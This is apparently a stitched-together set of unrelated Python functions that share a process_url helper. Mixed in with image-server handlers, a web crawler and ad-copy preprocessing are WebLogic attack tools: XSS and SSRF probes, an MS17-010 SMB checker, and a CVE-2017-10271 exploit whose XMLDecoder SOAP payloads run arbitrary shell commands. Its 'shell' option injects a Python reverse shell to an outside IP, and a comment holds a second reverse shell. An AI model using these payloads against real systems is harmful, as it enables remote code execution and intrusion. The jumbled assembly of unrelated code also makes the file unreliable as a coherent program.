def detect_uddi_xss(url): headers = { 'Host': '127.0.0.1:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Upgrade-Insecure-Requests': '1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6,zh-TW;q=0.5', 'Cookie': 'publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; JSESSIONID=h0Vd0MghcMhQ2XG5MkQnGgylJPlymlnpqJJn2T0ryvL3PL04tv1w!1520773416', 'Connection': 'close' } try: (host, port) = utils.process_url(url) targeturl = "http://" + host + ":" + str( port) + '/uddiexplorer/SetupUDDIExplorer.jsp' logging.info(targeturl) req = urllib2.Request(targeturl, headers=headers) r = urllib2.urlopen(req, timeout=5) if r'<script>alert(2)</script>' in r.read(): print "[+] uddiexplorer Reflected XSS FOUND!!", url return 1 else: print "[-] uddiexplorer Reflected XSS NOT FOUND", url return 0 except Exception, e: print e return 0
def t3_enabled(url): try: (host, port) = utils.process_url(url) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host, port) sock.settimeout(10) # print 'connecting to %s port %s' % server_address sock.connect(server_address) # Send headers headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' # print 'sending Hello' sock.sendall(headers) data = sock.recv(1024) #print data #print >>sys.stderr, 'received "%s"' % data if not data.startswith('HELO'): msg = 't3_send exception: receive HELO fail!' print msg return 0 else: print "T3 connection success" return 1 sock.close() except Exception, e: msg = "t3_send exception:%s" % e print msg return 0
def handle_request(): server = os.environ["SERVER_NAME"].split(":")[0] path = os.environ["REQUEST_URI"] # Acquire lockfile lock = '/tmp/%s' % sha_constructor(path).hexdigest() if os.path.isfile(lock): doRedirect(path) return with lock_file(lock): if DEBUG: import cgitb cgitb.enable() try: url_parts = process_url(path, server) except Http404, e: do404(e.message, DEBUG) return new_file = Transmogrify(url_parts['original_file'], url_parts['actions']) new_file.save() doRedirect(path)
def send_payload(url, payload, sig, name): # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.93.41.180",55555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' headers = { 'Host': '127.0.0.1:7001', 'Content-Type': 'text/xml', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' } #r = requests.post(url, headers=headers, data=payload_windows) #if r.status_code==500 and evidence in r.text: # print "[!!windows]", url try: (host, port) = utils.process_url(url) headers['Host'] = ''.join([host, ':', str(port)]) # print headers r1 = requests.post(url, headers=headers, data=payload, timeout=3) if r1.status_code == 500 and re.search(sig, r1.text): #print r1.url print r1.text print "[+]", url, "-", name return 1 else: return 0 except Exception as e: # print e return 0
def testAliases(self): import utils utils.PATH_ALIASES = {'/media/':'/testdata/'} utils.BASE_PATH = os.path.abspath(os.path.dirname(__file__)) url = "/media/horiz_img_r200.jpg" url += "?%s" % self.doShaHash('_r200') result = utils.process_url(url) self.assertEquals(result['original_file'], os.path.join(utils.BASE_PATH, 'testdata', 'horiz_img.jpg'))
def handle_request(): if DEBUG: import cgitb cgitb.enable() try: server = os.environ["SERVER_NAME"].split(":")[0] url_parts = process_url(os.environ['REQUEST_URI'], server) except Http404, e: do404(e.message, DEBUG)
def test_aliases(self): import utils import os os.environ["TRANSMOGRIFY_PATH_ALIASES"] = "/media/,/testdata/" utils.PATH_ALIASES = {"/media/": "/testdata/"} url = "/media/horiz_img_r200.jpg" url += "?%s" % self.do_sha_hash("_r200") result = utils.process_url(url, document_root=HERE) self.assertEquals(result["original_file"], get_test_filepath("horiz_img.jpg"))
def transmogrify_serve(request, path, document_root=None, show_indexes=False): if HEXDIGEST_RE.match(request.META['QUERY_STRING']): try: request_uri = "%s?%s" % (path, request.META['QUERY_STRING']) server = request.META["SERVER_NAME"].split(":")[0] url_parts = utils.process_url(request_uri, server, document_root) if not os.path.exists(url_parts['requested_file']): new_file = Transmogrify(url_parts['original_file'], url_parts['actions']) new_file.save() except utils.Http404, e: raise Http404(e)
def app(environ, start_response): from settings import DEBUG cropname = None server = environ['SERVER_NAME'] quality = 80 request_uri = get_path(environ) path_and_query = request_uri.lstrip('/') if path_and_query is "": return do_404(environ, start_response, "Not Found", DEBUG) if environ.get('REQUEST_METHOD', 'GET') == 'PURGE': return handle_purge(environ, start_response) # Acquire lockfile lock = '/tmp/%s' % sha1(path_and_query).hexdigest() if os.path.isfile(lock): return do_redirect(environ, start_response, request_uri) with lock_file(lock): try: url_parts = process_url(path_and_query, server) output_path, _ = os.path.split(url_parts['requested_file']) makedirs(output_path) if not os.path.exists(url_parts['original_file']): raise Http404 if not os.path.isfile(url_parts['original_file']): raise Http404 except Http404 as e: return do_404(environ, start_response, e.message, DEBUG) new_file = Transmogrify( url_parts['original_file'], url_parts['actions'], quality=quality, output_path=output_path ) new_file.cropname = cropname new_file.save() if cropname: # Rewrite the request_uri to use the new file with the # cropname urlbits = list(urlparse.urlsplit(request_uri)) output_filename = new_file.get_processed_filename() filename = os.path.basename(output_filename) requested_dir = os.path.dirname(urlbits[2]) urlbits[2] = os.path.join(requested_dir, filename) request_uri = urlparse.urlunsplit(urlbits) return do_redirect(environ, start_response, request_uri)
def handle_request(): # Acquire lockfile lock = '/tmp/%s' % sha1(os.environ["REQUEST_URI"]).hexdigest() if os.path.isfile(lock): print "Location: %s" % os.environ["REQUEST_URI"] print return open(lock, 'w') if DEBUG: import cgitb cgitb.enable() try: server = os.environ["SERVER_NAME"].split(":")[0] url_parts = process_url(os.environ['REQUEST_URI'], server) except Http404, e: do404(e.message, DEBUG)
def handle_request(): # Acquire lockfile lock = '/tmp/%s' % sha_constructor(os.environ["REQUEST_URI"]).hexdigest() if os.path.isfile(lock): print "Location: %s" % os.environ["REQUEST_URI"] print return open(lock, 'w') if DEBUG: import cgitb cgitb.enable() try: server = os.environ["SERVER_NAME"].split(":")[0] url_parts = process_url(os.environ['REQUEST_URI'], server) except Http404, e: do404(e.message, DEBUG)
def run(url, payload, sig, vul): try: (host, port) = utils.process_url(url) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) t3handshake(sock, (host, port)) buildT3RequestObject(sock, port) rs = sendEvilObjData(sock, payload) sock.close() p = re.findall(sig, rs, re.S) if len(p) > 0: print '%s:%d is vul %s' % (host, port, vul) return 1 else: print '%s:%d is not vul %s' % (host, port, vul) return 0 except Exception, e: print e return 0
def detect_ssrf(url): try: logging.info("url is %s", url) (host, port) = utils.process_url(url) targeturl = "http://" + host + ":" + str( port) + "/uddiexplorer/SearchPublicRegistries.jsp" logging.info("targeturl is %s", targeturl) urllib2.urlopen(targeturl, timeout=20) payload = "?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:{}".format( port) r = urllib2.urlopen(targeturl + payload, timeout=20).read() if "Operation timed out" in r or "Socket Closed" in r or "Received a response from url" in r or "Connection reset by peer" in r: print "[+] uddiexplorer ssrf FOUND!" return 1 else: print "[-] uddiexplorer ssrf NOT FOUND" return 0 except Exception, e: print e return 0
def do_jobs(self): self.get_jobs(self.args.jobs or 2) time_before_yield = 0.0 for tasks in self.yield_tasks(): if not time_before_yield == 0.0: self.print_queue.put("got yield tasks, took %f seconds" % ( time.time()-time_before_yield)) time_before_get = time.time() get_requests = dict([(grequests.get(task, timeout=5), task) for task in tasks]) grequests.map(get_requests.keys(), stream=True) self.print_queue.put("got responses, took %f seconds" % ( time.time()-time_before_get)) found_count = 0.0 get_successful = [] get_failed = [] get_wrong_type = [] get_responses = {} time_before_process = time.time() for request in list(get_requests): original_url = get_requests[request].split("://", 1)[-1] response = request.response if not response or not response.status_code < 400: get_failed.append(original_url) elif not response.headers.get("content-type", "").startswith( "text/"): get_wrong_type.append(original_url) else: get_responses[response] = original_url self.print_queue.put("finished processing, took %f seconds" % ( time.time()-time_before_process)) time_before_responses = time.time() gevent.joinall([gevent.spawn(getattr, response, "text") for response in get_responses]) self.print_queue.put("got second responses, took %f seconds" % ( time.time()-time_before_responses)) time_before_second_process = time.time() for response in list(get_responses): original_url = get_responses[response] try: text = response.text except: get_failed.append(original_url) continue if not text: get_failed.append(original_url) else: actual_url = response.url get_successful.append(original_url) found_urls = utils.find_urls(response.text, actual_url) found_count += len(found_urls) for url in found_urls: url_parts = utils.process_url(url) if url_parts: self.statsd_counter.increment("url_found") self.insert_queue.put(url_parts) self.print_queue.put("finished second processing, took %f seconds" % (time.time()-time_before_second_process)) time_taken = time.time()-time_before_get stats = "tried %d" % len(tasks) stats += ", success %d" % len(get_successful) stats += ", fail %d" % len(get_failed) stats += ", wrong %d" % len(get_wrong_type) stats += ", took %f seconds" % time_taken if get_successful: stats += ", found %d" % found_count stats += ", %f/site" % (found_count/len(get_successful)) stats += ", %f/second" % (found_count/time_taken) self.print_queue.put(stats) for url in get_successful: self.database.timestamp(url) for url in get_failed: self.database.timestamp(url, 1) for url in get_wrong_type: self.database.timestamp(url, 2) time_before_join = time.time() self.insert_queue.join() self.print_queue.put("finished insert queue join, took %f seconds" % (time.time()-time_before_join)) time_before_yield = time.time()
#NoJudgment:0 Excellent same overlap Good NJ:PageDidNotLoad NJ:Login Detrimental subset Very Bad disjoint NoJudgment:Foreign NJ:Foreign NoJudgment:Login NoJudgment:PageDidNotLoad superset VeryBad Fair Bad Perfect with open(corpus_file,'r', encoding='utf-8') as f: header = next(f) print('header is {}.'.format(header)) for line in f: arr = line.strip('\n').split('\t') ac_label = arr[0].strip() lp_label = arr[1].strip() adCopyJudgment_set.add(ac_label) adLpJudgment_set.add(lp_label) query = utils.preprocess(arr[2].strip()) query_set.add(query) keyword = utils.preprocess(arr[3]) adText = utils.preprocess(arr[4]) adTitle = utils.preprocess(arr[5]) ad_url = utils.process_url(arr[6]) lp_title = utils.preprocess(arr[7]) if((ac_label=='Perfect')|(ac_label=='Excellent')|(ac_label=='Good')): ac_training_file_f.write('{} {}\n'.format(query, adText)) ac_training_file_f.write('{} {}\n'.format(query, adTitle)) ac_training_file_f.write('{} {}\n'.format(query, keyword)) ac_training_file_f.write('{} {}\n'.format(adText, keyword)) ac_training_file_f.write('{} {}\n'.format(adTitle, keyword)) ac_training_file_f.write('{} {}\n'.format(adTitle, adText)) ac_training_file_f.write('{} {}\n'.format(query, ad_url)) ac_training_file_f.write('{} {}\n'.format(keyword, ad_url)) ac_training_file_f.write('{} {}\n'.format(adTitle, ad_url)) ac_training_file_f.write('{} {}\n'.format(adText, ad_url)) ac_cnt +=10 all_ac_cnt +=1 all_ad_copy_training_file_f.write('{} {} {} {} {}\n'.format(query, ad_url, keyword, adTitle, adText))
def check(url, port=445): """Check if MS17_010 SMB Vulnerability exists. """ try: (ip, _) = utils.process_url(url) buffersize = 1024 timeout = 5.0 # Send smb request based on socket. client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.settimeout(timeout) client.connect((ip, port)) # SMB - Negotiate Protocol Request raw_proto = negotiate_proto_request() client.send(raw_proto) tcp_response = client.recv(buffersize) # SMB - Session Setup AndX Request raw_proto = session_setup_andx_request() client.send(raw_proto) tcp_response = client.recv(buffersize) netbios = tcp_response[:4] smb_header = tcp_response[4:36] # SMB Header: 32 bytes smb = SMB_HEADER(smb_header) user_id = struct.pack('<H', smb.user_id) # parse native_os from Session Setup Andx Response session_setup_andx_response = tcp_response[36:] native_os = session_setup_andx_response[9:].split('\x00')[0] # SMB - Tree Connect AndX Request raw_proto = tree_connect_andx_request(ip, user_id) client.send(raw_proto) tcp_response = client.recv(buffersize) netbios = tcp_response[:4] smb_header = tcp_response[4:36] # SMB Header: 32 bytes smb = SMB_HEADER(smb_header) tree_id = struct.pack('<H', smb.tree_id) process_id = struct.pack('<H', smb.process_id) user_id = struct.pack('<H', smb.user_id) multiplex_id = struct.pack('<H', smb.multiplex_id) # SMB - PeekNamedPipe Request raw_proto = peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id) client.send(raw_proto) tcp_response = client.recv(buffersize) netbios = tcp_response[:4] smb_header = tcp_response[4:36] smb = SMB_HEADER(smb_header) # nt_status = smb_header[5:9] nt_status = struct.pack('BBH', smb.error_class, smb.reserved1, smb.error_code) # 0xC0000205 - STATUS_INSUFF_SERVER_RESOURCES - vulnerable # 0xC0000008 - STATUS_INVALID_HANDLE # 0xC0000022 - STATUS_ACCESS_DENIED if nt_status == '\x05\x02\x00\xc0': log.info("[+] [{}] is likely VULNERABLE to MS17-010! ({})".format( ip, native_os)) # vulnerable to MS17-010, check for DoublePulsar infection raw_proto = trans2_request(tree_id, process_id, user_id, multiplex_id) client.send(raw_proto) tcp_response = client.recv(buffersize) netbios = tcp_response[:4] smb_header = tcp_response[4:36] smb = SMB_HEADER(smb_header) if smb.multiplex_id == 0x0051: key = calculate_doublepulsar_xor_key(smb.signature) log.info( "Host is likely INFECTED with DoublePulsar! - XOR Key: {}". format(key)) return 1 return 1 elif nt_status in ('\x08\x00\x00\xc0', '\x22\x00\x00\xc0'): log.info("[-] [{}] does NOT appear vulnerable".format(ip)) return 0 else: log.info( "[-] [{}] Unable to detect if this host is vulnerable".format( ip)) return 0 except Exception as err: log.error("[-] [{}] Exception: {}".format(ip, err)) return 0 finally: client.close()
def app(environ, start_response): cropname = None server = environ['SERVER_NAME'] quality = 80 if "path=" in environ.get("QUERY_STRING", ""): # I should probably require a POST for this, but meh, let's not # rock the boat. # transmogrify is being used directly and not as a 404 handler query_dict = urlparse.parse_qs(environ['QUERY_STRING']) path = query_dict.get("path", [""])[0] key = query_dict.get("key", [""])[0] # validate the query params if not (path and key): # The required parameters were not given start_response("400 Bad Response", [("Content-Type", "text/plain")]) return ["path and key are required query parameters"] cropname = query_dict.get("cropname", [None])[0] quality = 100 # rewrite the environ to look like a 404 handler environ['REQUEST_URI'] = path + "?" + key request_uri = environ['REQUEST_URI'] path_and_query = request_uri.lstrip("/") requested_path = urlparse.urlparse(path_and_query).path if path_and_query is "": return do404(environ, start_response, "Not Found", DEBUG) # Acquire lockfile lock = '/tmp/%s' % sha_constructor(path_and_query).hexdigest() if os.path.isfile(lock): return doRedirect(environ, start_response, request_uri) with lock_file(lock): if FALLBACK_SERVERS: result = do_fallback(FALLBACK_SERVERS, BASE_PATH, requested_path) if result == (False, "bad path"): start_response("403 Forbidden", []) return [] try: url_parts = process_url(path_and_query, server) except Http404, e: return do404(environ, start_response, e.message, DEBUG) new_file = Transmogrify( url_parts['original_file'], url_parts['actions'], quality=quality ) new_file.cropname = cropname new_file.save() if cropname: # Rewrite the request_uri to use the new file with the # cropname urlbits = list(urlparse.urlsplit(request_uri)) output_filename = new_file.get_processed_filename() filename = os.path.basename(output_filename) requested_dir = os.path.dirname(urlbits[2]) urlbits[2] = os.path.join(requested_dir, filename) request_uri = urlparse.urlunsplit(urlbits) return doRedirect(environ, start_response, request_uri)
ad_copy_training_file = "data\\glove\\glove_adcopy_click_training_v3.txt" all_ad_copy_training_file = "data\\glove\\all_glove_adcopy_click_training_v3.txt" query_file = "data\\glove\\glove_query_set_v3.txt" query_set = set() ac_training_file_f = open(ad_copy_training_file, 'w', encoding='utf-8') all_ac_training_file_f = open(all_ad_copy_training_file, 'w', encoding='utf-8') query_file_f = open(query_file, 'w', encoding='utf-8') ac_cnt = 0 with open(click_corpus_file, 'r', encoding='utf-8') as f: for line in f: arr = line.strip('\n').split('\t') ac_label = int(arr[12].strip()) ad_url = utils.process_url(arr[14]) adText = utils.preprocess(arr[15]) adTitle = utils.preprocess(arr[16]) keyword = utils.preprocess(arr[17]).strip() query = utils.preprocess(arr[18]).strip() query_set.add(query) print('{} : {} :{} :{} :{} :{}, url:{}'.format(ac_label, ad_url, adText, adTitle, keyword, query, ad_url)) if (ac_label > 2): ac_training_file_f.write('{} {}\n'.format(query, adText)) ac_training_file_f.write('{} {}\n'.format(query, adTitle)) ac_training_file_f.write('{} {}\n'.format(query, keyword)) ac_training_file_f.write('{} {}\n'.format(adText, keyword)) ac_training_file_f.write('{} {}\n'.format(adTitle, keyword)) ac_training_file_f.write('{} {}\n'.format(adTitle, adText))
def main(): parser = optparse.OptionParser() parser.add_option('-H', dest='tgtHost', type="string", help='specify target host') parser.add_option('-p', dest='tgtPort', type='int', help="specify target port") parser.add_option( '-b', action="store_true", dest='batch', default=False, help="do a batch scan obtaining url list from remote server") parser.add_option('--time-based', action="store_true", dest='time_base', help="time based", default=False) parser.add_option('-c', dest='command', help='command to execute') parser.add_option('-f', dest='filepath', help='file to load') parser.add_option('-O', dest='os', help='choose OS') parser.add_option('--create-file', action="store_true", dest='create_file', help="create file using native java", default=False) (options, args) = parser.parse_args() tgtHost = options.tgtHost tgtPort = options.tgtPort batch = options.batch time_base = options.time_base command = options.command filepath = options.filepath os = options.os create_file = options.create_file if batch and time_base and not tgtHost and not tgtPort and not command and not create_file: urllist = utils.get_url_list( "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do" ) if urllist: target_host_port = map(utils.process_url, urllist) pool = ThreadPool(50) final_results_10271 = pool.map(cve_2017_10271_time_based, target_host_port) pool.close() pool.join() json_data_10271 = utils.assembly_data( "030103", dict(zip(urllist, final_results_10271))) print utils.post_data( json_data_10271, "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do" ) elif batch and tgtHost == None and tgtPort == None and not time_base and not command and not create_file: urllist = utils.get_url_list( "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do" ) #print urllist assert 'https://' not in urllist assert 'http://' not in urllist assert 'http' not in urllist assert 'https' not in urllist if urllist: target_url_list1 = map( lambda url: 'http://' + utils.process_url(url)[0] + ":" + str( utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType', urllist) target_url_list2 = map( lambda url: 'http://' + utils.process_url(url)[0] + ":" + str( utils.process_url(url)[1]) + '/wls-wsat/CoordinatorPortType11', urllist) pool = ThreadPool(50) results1_10271 = pool.map(cve_2017_10271, target_url_list1) results2_10271 = pool.map(cve_2017_10271, target_url_list2) results1_10352 = pool.map(cve_2017_10352, target_url_list1) results2_10352 = pool.map(cve_2017_10352, target_url_list2) pool.close() pool.join() final_results_10271 = [ x or y for x, y in zip(results1_10271, results2_10271) ] json_data_10271 = utils.assembly_data( "030103", dict(zip(urllist, final_results_10271))) # if 'http://www.gzzwjw.gov.cn' in dict(zip(urllist, final_results_10271)): # print dict(zip(urllist, final_results_10271))['http://www.gzzwjw.gov.cn'] final_results_10352 = [ x or y for x, y in zip(results1_10352, results2_10352) ] json_data_10352 = utils.assembly_data( "030111", dict(zip(urllist, final_results_10352))) # print json_data_10271 # print json_data_10352 print utils.post_data( json_data_10271, "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do" ) print utils.post_data( json_data_10352, "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do" ) elif tgtHost and tgtPort and not batch and not time_base and not command and not create_file: url1 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType' url2 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType11' cve_2017_10271(url1) cve_2017_10271(url2) cve_2017_10352(url1) cve_2017_10352(url2) elif tgtHost and tgtPort and time_base and not batch and not command and not create_file: cve_2017_10271_time_based((tgtHost, tgtPort)) elif tgtHost and tgtPort and not time_base and not batch and not command and create_file: url1 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType' url2 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType11' send_payload(url1, payload_create_file_10271, sig_10271, "cve_2017_10271") send_payload(url2, payload_create_file_10271, sig_10271, "cve_2017_10271") elif tgtHost and tgtPort and not time_base and not batch and command and os: payload_linux_10271 = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' payload_windows_10271 = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' url1 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType' url2 = "http://" + tgtHost + ":" + str( tgtPort) + '/wls-wsat/CoordinatorPortType11' if os == 'linux': if command == 'shell': command = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.202.87.92",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ''' # print payload_linux_10271 print payload_linux_10271.format(command) send_payload(url1, payload_linux_10271.format(command), sig_10271, "cve_2017_10271") send_payload(url2, payload_linux_10271.format(command), sig_10271, "cve_2017_10271") elif os == 'win': print payload_windows_10271.format(command) send_payload(url1, payload_windows_10271.format(command), sig_10271, "cve_2017_10271") send_payload(url2, payload_windows_10271.format(command), sig_10271, "cve_2017_10271") elif not tgtHost and not tgtPort and filepath and not command and not batch and not time_base: with open(filepath, 'r') as f: u_list = f.readlines() for i in u_list: url = "http://" + i.strip() + '/wls-wsat/CoordinatorPortType' # send_payload(url,payload_linux_10271, sig_10271, "cve_2017_10271") cve_2017_10271(url) cve_2017_10352(url) else: parser.print_help() exit(0)